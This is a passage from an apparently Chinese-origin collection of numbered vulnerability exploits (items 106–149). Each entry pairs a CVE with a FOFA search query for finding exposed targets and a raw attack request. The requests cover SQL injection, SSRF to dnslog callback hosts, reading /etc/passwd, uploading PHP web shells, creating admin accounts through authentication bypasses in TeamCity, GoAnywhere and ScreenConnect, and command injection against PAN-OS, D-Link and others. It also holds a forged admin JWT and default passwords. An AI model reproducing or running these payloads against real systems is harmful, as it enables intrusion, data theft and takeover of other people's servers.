FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthorized administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Byzoro Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

